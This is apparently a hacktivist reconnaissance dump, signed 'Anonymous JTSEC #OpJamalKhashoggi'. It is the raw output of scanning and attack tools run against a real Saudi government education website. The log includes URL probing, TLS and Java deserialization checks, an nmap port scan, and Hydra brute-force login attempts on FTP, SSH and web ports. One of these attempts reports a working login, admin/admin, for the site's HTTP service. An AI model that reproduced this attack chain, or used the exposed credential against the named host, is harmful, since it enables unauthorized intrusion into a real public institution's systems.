 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 95 / 100 ]-[04:10:44] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/15/النشاط-الطلابي ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 96 / 100 ]-[04:10:47] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/43 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 97 / 100 ]-[04:10:49] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/13/p/9 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 98 / 100 ]-[04:10:52] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/60 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 99 / 100 ]-[04:10:53] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/39 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

[ INFO ] [ Shutting down ]
[ INFO ] [ End of process INURLBR at [19-11-2018 04:10:53]
[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.hbthedu.gov.sa.txt  ]
|_________________________________________________________________________________________

\_________________________________________________________________________________________/
#######################################################################################################################################

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking https://www.hbthedu.gov.sa
#######################################################################################################################################


 AVAILABLE PLUGINS
 -----------------

  PluginSessionResumption
  PluginOpenSSLCipherSuites
  PluginChromeSha1Deprecation
  PluginHeartbleed
  PluginSessionRenegotiation
  PluginCompression
  PluginCertInfo
  PluginHSTS


 CHECKING HOST(S) AVAILABILITY
 -----------------------------

   www.hbthedu.gov.sa:443              => 85.17.16.76:443


 SCAN RESULTS FOR WWW.HBTHEDU.GOV.SA:443 - 85.17.16.76:443
 ---------------------------------------------------------

Unhandled exception when processing --reneg:
_nassl.OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

Unhandled exception when processing --compression:
_nassl.OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

  * Session Resumption:
      With Session IDs:                  ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
        ERROR #1: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
        ERROR #2: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
        ERROR #3: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
        ERROR #4: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
        ERROR #5: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
      With TLS Session Tickets:          ERROR: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

Unhandled exception when processing --certinfo:
_nassl.OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

  * SSLV2 Cipher Suites:
      Undefined - An unexpected error happened:
                 RC4-MD5                             timeout - timed out
                 RC2-CBC-MD5                         timeout - timed out
                 IDEA-CBC-MD5                        timeout - timed out
                 EXP-RC4-MD5                         timeout - timed out
                 EXP-RC2-CBC-MD5                     timeout - timed out
                 DES-CBC3-MD5                        timeout - timed out
                 DES-CBC-MD5                         timeout - timed out

  * SSLV3 Cipher Suites:
      Undefined - An unexpected error happened:
                 SEED-SHA                            timeout - timed out
                 RC4-SHA                             timeout - timed out
                 RC4-MD5                             timeout - timed out
                 NULL-SHA                            timeout - timed out
                 NULL-MD5                            timeout - timed out
                 IDEA-CBC-SHA                        timeout - timed out
                 EXP-RC4-MD5                         timeout - timed out
                 EXP-RC2-CBC-MD5                     timeout - timed out
                 EXP-EDH-RSA-DES-CBC-SHA             timeout - timed out
                 EXP-EDH-DSS-DES-CBC-SHA             timeout - timed out
                 EXP-DES-CBC-SHA                     timeout - timed out
                 EXP-ADH-RC4-MD5                     timeout - timed out
                 EXP-ADH-DES-CBC-SHA                 timeout - timed out
                 EDH-RSA-DES-CBC3-SHA                timeout - timed out
                 EDH-RSA-DES-CBC-SHA                 timeout - timed out
                 EDH-DSS-DES-CBC3-SHA                timeout - timed out
                 EDH-DSS-DES-CBC-SHA                 timeout - timed out
                 ECDHE-RSA-RC4-SHA                   timeout - timed out
                 ECDHE-RSA-NULL-SHA                  timeout - timed out
                 ECDHE-RSA-AES256-SHA                timeout - timed out
                 ECDHE-RSA-AES128-SHA                timeout - timed out
                 ECDHE-ECDSA-RC4-SHA                 timeout - timed out
                 ECDHE-ECDSA-NULL-SHA                timeout - timed out
                 ECDHE-ECDSA-DES-CBC3-SHA            timeout - timed out
                 ECDHE-ECDSA-AES128-SHA              timeout - timed out
                 ECDH-RSA-RC4-SHA                    timeout - timed out
                 ECDH-RSA-NULL-SHA                   timeout - timed out
                 ECDH-RSA-DES-CBC3-SHA               timeout - timed out
                 ECDH-RSA-AES256-SHA                 timeout - timed out
                 ECDH-RSA-AES128-SHA                 timeout - timed out
                 ECDH-ECDSA-RC4-SHA                  timeout - timed out
                 ECDH-ECDSA-NULL-SHA                 timeout - timed out
                 ECDH-ECDSA-DES-CBC3-SHA             timeout - timed out
                 ECDH-ECDSA-AES256-SHA               timeout - timed out
                 ECDH-ECDSA-AES128-SHA               timeout - timed out
                 DHE-RSA-SEED-SHA                    timeout - timed out
                 DHE-RSA-CAMELLIA256-SHA             timeout - timed out
                 DHE-RSA-AES256-SHA                  timeout - timed out
                 DHE-RSA-AES128-SHA                  timeout - timed out
                 DHE-DSS-SEED-SHA                    timeout - timed out
                 DHE-DSS-CAMELLIA256-SHA             timeout - timed out
                 DHE-DSS-CAMELLIA128-SHA             timeout - timed out
                 DHE-DSS-AES256-SHA                  timeout - timed out
                 DH-RSA-DES-CBC3-SHA                 timeout - timed out
                 DH-RSA-DES-CBC-SHA                  timeout - timed out
                 DH-RSA-CAMELLIA256-SHA              timeout - timed out
                 DH-RSA-CAMELLIA128-SHA              timeout - timed out
                 DH-RSA-AES256-SHA                   timeout - timed out
                 DH-DSS-SEED-SHA                     timeout - timed out
                 DH-DSS-DES-CBC3-SHA                 timeout - timed out
                 DH-DSS-DES-CBC-SHA                  timeout - timed out
                 DH-DSS-CAMELLIA256-SHA              timeout - timed out
                 DH-DSS-CAMELLIA128-SHA              timeout - timed out
                 DH-DSS-AES256-SHA                   timeout - timed out
                 DH-DSS-AES128-SHA                   timeout - timed out
                 CAMELLIA128-SHA                     timeout - timed out
                 AES256-SHA                          timeout - timed out
                 AES128-SHA                          timeout - timed out
                 AECDH-RC4-SHA                       timeout - timed out
                 AECDH-NULL-SHA                      timeout - timed out
                 AECDH-DES-CBC3-SHA                  timeout - timed out
                 AECDH-AES256-SHA                    timeout - timed out
                 AECDH-AES128-SHA                    timeout - timed out
                 ADH-SEED-SHA                        timeout - timed out
                 ADH-RC4-MD5                         timeout - timed out
                 ADH-DES-CBC3-SHA                    timeout - timed out
                 ADH-CAMELLIA256-SHA                 timeout - timed out
                 ADH-CAMELLIA128-SHA                 timeout - timed out
                 ADH-AES256-SHA                      timeout - timed out
                 ADH-AES128-SHA                      timeout - timed out


 SCAN COMPLETED IN 136.51 S
 --------------------------
Version: 1.11.12-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 85.17.16.76

Testing SSL server www.hbthedu.gov.sa on port 443 using SNI name www.hbthedu.gov.sa

  TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

  TLS renegotiation:
Session renegotiation not supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):


 * --- JexBoss: Jboss verify and EXploitation Tool  --- *
 |  * And others Java Deserialization Vulnerabilities * |
 |                                                      |
 | @author:  João Filho Matos Figueiredo                |
 | @contact: joaomatosf@gmail.com                       |
 |                                                      |
 | @update: https://github.com/joaomatosf/jexboss       |
 #______________________________________________________#

 @version: 1.2.4

 * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **


 ** Checking Host: http://www.hbthedu.gov.sa:8888 **

 [*] Checking admin-console:                  [ OK ]
 [*] Checking Struts2:                        [ OK ]
 [*] Checking Servlet Deserialization:        [ OK ]
 [*] Checking Application Deserialization:    [ OK ]
 [*] Checking Jenkins:                        [ OK ]
 [*] Checking web-console:                    [ OK ]
 [*] Checking jmx-console:                    [ OK ]
 [*] Checking JMXInvokerServlet:              [ OK ]


 * Results:
   The server is not vulnerable to bugs tested ... :D

 * Info: review, suggestions, updates, etc:
   https://github.com/joaomatosf/jexboss

 * DONATE: Please consider making a donation to help improve this tool,
 * Bitcoin Address:  14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C

#######################################################################################################################################

I, [2018-11-19T04:13:43.588582 #16436]  INFO -- : Initiating port scan
I, [2018-11-19T04:15:52.756300 #16436]  INFO -- : Using nmap scan output file logs/nmap_output_2018-11-19_04-13-43.xml
I, [2018-11-19T04:15:52.757479 #16436]  INFO -- : Discovered open port: 85.17.16.76:80
I, [2018-11-19T04:15:53.394412 #16436]  INFO -- : Discovered open port: 85.17.16.76:443
I, [2018-11-19T04:15:53.937734 #16436]  INFO -- : <<<Enumerating vulnerable applications>>>


--------------------------------------------------------
<<<Yasuo discovered following vulnerable applications>>>
--------------------------------------------------------
+----------+--------------------+-------------------+----------+----------+
| App Name | URL to Application | Potential Exploit | Username | Password |
+----------+--------------------+-------------------+----------+----------+
+----------+--------------------+-------------------+----------+----------+
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 04:16 EST
Nmap scan report for www.hbthedu.gov.sa (85.17.16.76)
Host is up (0.13s latency).
Not shown: 19 filtered ports, 3 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
#######################################################################################################################################

 + -- --=[Port 21 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:16:52
[DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
[DATA] attacking ftp://www.hbthedu.gov.sa:21/
[STATUS] 74.00 tries/min, 74 tries in 00:01h, 154 to do in 00:03h, 1 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:19:46
 + -- --=[Port 22 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:19:46
[DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
[DATA] attacking ssh://www.hbthedu.gov.sa:22/
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:19:46
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking ssh://www.hbthedu.gov.sa:22/
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 80 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:19:47
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking http-get://www.hbthedu.gov.sa:80//
[80][http-get] host: www.hbthedu.gov.sa   login: admin   password: admin
[STATUS] attack finished for www.hbthedu.gov.sa (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:20:03
 + -- --=[Port 110 closed... skipping.
 + -- --=[Port 139 closed... skipping.
 + -- --=[Port 162 closed... skipping.
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 443 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:20:03
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking http-gets://www.hbthedu.gov.sa:443//
[STATUS] 90.00 tries/min, 90 tries in 00:01h, 1443 to do in 00:17h, 1 active
[STATUS] 89.33 tries/min, 268 tries in 00:03h, 1265 to do in 00:15h, 1 active
[STATUS] 88.86 tries/min, 622 tries in 00:07h, 911 to do in 00:11h, 1 active
[STATUS] 88.50 tries/min, 1062 tries in 00:12h, 471 to do in 00:06h, 1 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:37:00
#######################################################################################################################################
                                       Anonymous JTSEC #OpJamalKhashoggi Full Recon #13